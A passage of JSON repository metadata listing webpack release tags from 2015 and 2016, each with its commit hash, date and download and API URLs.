d_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/t